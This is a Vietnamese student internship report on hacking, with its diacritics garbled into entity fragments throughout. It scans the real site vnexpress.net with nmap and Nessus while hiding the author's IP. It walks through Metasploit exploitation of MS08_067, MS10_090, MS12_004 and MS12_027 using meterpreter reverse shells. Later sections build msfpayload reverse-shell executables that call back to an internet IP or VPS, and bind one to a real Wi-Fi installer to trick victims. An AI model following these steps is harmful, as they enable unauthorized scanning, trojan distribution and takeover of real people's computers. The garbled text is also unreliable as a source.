Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
ii
LỜI CẢM ƠN
Em xin caacutem ơn Quyacute Thầy Cocirc khoa Cao đẳng thực hagravenh trường Đại học Cocircng
nghệ TPHCM ndash HUTECH đatilde tạo điều kiện cho em được tham gia thực tập thực tế tại
caacutec cocircng ty
Em xin caacutem ơn Quyacute Thầy Cocirc đatilde nhiệt tigravenh giảng dạy giuacutep em coacute một lượng
kiến thức đầy đủ để coacute thể hoagraven thagravenh baacuteo caacuteo thực tập nagravey
Em xin caacutem ơn thầy Votilde Đỗ Thắng ndash Giaacutem đốc Trung tacircm đagraveo tạo quản trị mạng
vagrave an ninh mạng Athena đatilde hết lograveng hướng dẫn em trong quaacute trigravenh thực tập
Em xin caacutem ơn Thầy Nguyễn Ngọc Đại đatilde đồng yacute hướng dẫn giuacutep em hoagraven
thagravenh baacuteo caacuteo thực tập
Caacutem ơn tất cả caacutec bạn begrave thuộc tập thể lớp C12QM15 đatilde cugraveng nhau tham gia
học tập trong suốt 2 năm qua
Sinh viecircn thực hiện
ĐAgraveO COcircNG TRUNG
iii
CỘNG HOgraveA XAtilde HỘI CHỦ NGHĨA VIỆT NAM
Độc lập ndash Tự do ndash Hạnh phuacutec
NHẬN XEacuteT THỰC TẬP
Họ vagrave tecircn sinh viecircn ĐAgraveO COcircNG TRUNG
Matilde sinh viecircn 12203214
Khoaacute học 2012-2014
1 Thời gian thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
2 Bộ phận thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
3 Tinh thần traacutech nhiệm với cocircng việc vagrave yacute thức chấp hagravenh kỷ luật
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
4 Kết quả thực tập theo đề tagravei
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
5 Nhận xeacutet chung
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
